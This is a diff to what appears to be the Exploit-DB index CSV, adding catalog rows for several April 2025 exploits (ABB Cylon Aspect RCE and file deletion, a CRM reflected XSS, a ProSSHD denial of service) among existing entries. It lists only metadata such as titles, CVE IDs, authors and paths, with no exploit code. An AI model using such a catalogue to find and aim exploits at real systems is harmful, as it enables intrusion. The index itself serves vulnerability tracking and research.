@ -11642,6 +11643,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44151,exploits/multiple/remote/44151.txt,"μTorrent (uTorrent) Classic/Web - JSON-RPC Remote Code Execution / Information Disclosure",2018-02-20,"Google Security Research",remote,multiple,,2018-02-20,2018-02-21,1,,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1524
34111,exploits/multiple/webapps/34111.txt,"(GREEZLE) Global Real Estate Agent Login - Multiple SQL Injections",2010-06-09,"L0rd CrusAd3r",webapps,multiple,,2010-06-09,2014-07-19,1,,,,,,https://www.securityfocus.com/bid/40676/info
33760,exploits/multiple/webapps/33760.txt,"(Multiple Products) - 'banner.swf' Cross-Site Scripting",2010-03-15,MustLive,webapps,multiple,,2010-03-15,2014-06-15,1,,,,,,https://www.securityfocus.com/bid/38732/info
52107,exploits/multiple/webapps/52107.NA,"ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE)",2025-04-02,LiquidWorm,webapps,multiple,,2025-04-02,2025-04-02,0,CVE-2024-6298,,,,,
43378,exploits/multiple/webapps/43378.py,"Ability Mail Server 3.3.2 - Cross-Site Scripting",2017-12-20,"Aloyce J. Makalanga",webapps,multiple,,2017-12-20,2017-12-20,0,CVE-2017-17752,,,,http://www.exploit-db.comams3.exe,
49298,exploits/multiple/webapps/49298.txt,"Academy-LMS 4.3 - Stored XSS",2020-12-21,"Vinicius Alves",webapps,multiple,,2020-12-21,2022-06-03,0,,,,,,
49991,exploits/multiple/webapps/49991.txt,"Accela Civic Platform 21.1 - 'contactSeqNumber' Insecure Direct Object References (IDOR)",2021-06-14,"Abdulazeez Alaseeri",webapps,multiple,,2021-06-14,2021-06-14,0,CVE-2021-34369,,,,,
@ -13412,6 +13414,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51058,exploits/php/webapps/51058.txt,"Abantecart v1.3.2 - Authenticated Remote Code Execution",2023-03-25,"Sarang Tumne",webapps,php,,2023-03-25,2023-06-23,1,CVE-2022-26521,,,,,
27934,exploits/php/webapps/27934.txt,"Abarcar Realty Portal 5.1.5 - 'content.php' SQL Injection",2006-06-01,SpC-x,webapps,php,,2006-06-01,2013-08-29,1,CVE-2006-2853;OSVDB-26226,,,,,https://www.securityfocus.com/bid/18218/info
28944,exploits/php/webapps/28944.txt,"Abarcar Realty Portal 5.1.5/6.0.1 - Multiple SQL Injections",2006-11-08,"Benjamin Moss",webapps,php,,2006-11-08,2013-10-14,1,,,,,,https://www.securityfocus.com/bid/20970/info
52108,exploits/php/webapps/52108.NA,"ABB Cylon Aspect 3.08.01 - Arbitrary File Delete",2025-04-02,LiquidWorm,webapps,php,,2025-04-02,2025-04-02,0,CVE-2024-6209,,,,,
8555,exploits/php/webapps/8555.txt,"ABC Advertise 1.0 - Admin Password Disclosure",2009-04-27,SirGod,webapps,php,,2009-04-26,,1,OSVDB-54287;CVE-2009-1550,,,,,
45836,exploits/php/webapps/45836.txt,"ABC ERP 0.6.4 - Cross-Site Request Forgery (Update Admin)",2018-11-13,"Ihsan Sencan",webapps,php,80,2018-11-13,2018-11-13,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comabc_v_0_6_4.zip,
4338,exploits/php/webapps/4338.pl,"ABC estore 3.0 - 'cat_id' Blind SQL Injection",2007-08-29,k1tk4t,webapps,php,,2007-08-28,,1,OSVDB-38434;CVE-2007-4627,,,,,
@ -17930,6 +17933,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
33874,exploits/php/webapps/33874.txt,"Ektron CMS400.NET 7.5.2 - Multiple Vulnerabilities",2010-04-26,"Richard Moore",webapps,php,,2010-04-26,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/39679/info
45681,exploits/php/webapps/45681.txt,"Ekushey Project Manager CRM 3.1 - Cross-Site Scripting",2018-10-25,"Ismail Tasdelen",webapps,php,80,2018-10-25,2018-10-25,0,CVE-2018-18417,"Cross-Site Scripting (XSS)",,,,
46869,exploits/php/webapps/46869.py,"eLabFTW 1.8.5 - Arbitrary File Upload / Remote Code Execution",2019-05-20,liquidsky,webapps,php,,2019-05-20,2021-06-17,0,CVE-2019-12185,,,,,
52106,exploits/php/webapps/52106.NA,"Elaine's Realtime CRM Automation 6.18.17 - Reflected XSS",2025-04-02,"arfaoui haythem",webapps,php,,2025-04-02,2025-04-02,0,CVE-2024-42831,,,,,
48705,exploits/php/webapps/48705.txt,"elaniin CMS - Authentication Bypass",2020-07-26,BKpatron,webapps,php,,2020-07-26,2020-07-26,0,,,,,,
47858,exploits/php/webapps/47858.txt,"elaniin CMS 1.0 - Authentication Bypass",2020-01-06,riamloo,webapps,php,,2020-01-06,2020-04-13,1,,,,,,
37054,exploits/php/webapps/37054.py,"ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal",2015-05-18,pandujar,webapps,php,,2015-05-21,2015-05-21,0,CVE-2015-3337;OSVDB-121335,,,,,https://github.com/pandujar/elasticpwn/
@ -45066,6 +45070,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
34943,exploits/windows/remote/34943.txt,"Project Jug 1.0.0 - Directory Traversal",2010-11-01,"John Leitch",remote,windows,,2010-11-01,2014-10-12,1,,,,,,https://www.securityfocus.com/bid/44569/info
36235,exploits/windows/remote/36235.txt,"PROMOTIC 8.1.3 - Multiple Vulnerabilities",2011-10-14,"Luigi Auriemma",remote,windows,,2011-10-14,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/50133/info
12495,exploits/windows/remote/12495.pl,"ProSSHD 1.2 - (Authenticated) Remote (ASLR + DEP Bypass)",2010-05-03,"Alexey Sintsov",remote,windows,,2010-05-02,,1,,,,,http://www.exploit-db.comsshdlabp.exe,
52110,exploits/windows/remote/52110.txt,"ProSSHD 1.2 - Denial of Service (DOS)",2025-04-02,"Fernando Mengali",remote,windows,,2025-04-02,2025-04-02,0,CVE-2024-0725,,,,,
11618,exploits/windows/remote/11618.pl,"ProSSHD 1.2 20090726 - Remote Buffer Overflow",2010-03-02,"S2 Crew",remote,windows,,2010-03-01,,1,,,,,http://www.exploit-db.comsshdlabp.exe,
16346,exploits/windows/remote/16346.rb,"ProSysInfo TFTP server TFTPDWIN 0.4.2 - 'Filename' Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows,,2010-04-30,2016-10-27,1,CVE-2006-4948;OSVDB-29032,"Metasploit Framework (MSF)",,,http://www.exploit-db.comtftpdwin.exe,
3132,exploits/windows/remote/3132.pl,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1)",2007-01-15,"Jacopo Cervini",remote,windows,69,2007-01-14,2016-10-27,1,OSVDB-29032;CVE-2006-4948,,,,http://www.exploit-db.comtftpdwin.exe,
